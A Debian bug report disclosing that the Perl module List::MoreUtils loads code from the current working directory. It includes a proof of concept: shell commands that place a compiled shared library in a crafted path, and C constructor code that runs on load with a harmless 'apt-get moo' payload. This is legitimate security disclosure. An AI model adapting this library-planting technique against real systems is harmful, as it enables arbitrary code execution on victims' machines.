Package: liblist-moreutils-perl
Version: 0.413-1+b1
Tags: security
Control: affects -1 + check-all-the-things
List::MoreUtils tries to load code from a subdirectory of the current
working directory. This could lead to execution of arbitrary code if
cwd is untrusted.
Proof of concept:
$ mkdir -p '(eval 1)/auto/List/MoreUtils/'
$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so'
$ perl -e 'no lib "."; use List::MoreUtils'
(__)
(oo)
/------\/
/ | ||
* /\---/\
~~ ~~
..."Have you mooed today?"...
Segmentation fault
-- System Information:
Debian Release: stretch/sid
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64
Kernel: Linux 4.6.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages liblist-moreutils-perl depends on:
ii libc6 2.22-13
ii libexporter-tiny-perl 0.042-1
ii perl 5.22.2-1
ii perl-base [perlapi-5.22.1] 5.22.2-1
--
Jakub Wilk
#include <signal.h>
#include <stdlib.h>
void __attribute__((constructor)) moo() {
system("apt-get moo");
kill(0, SIGSEGV);
}
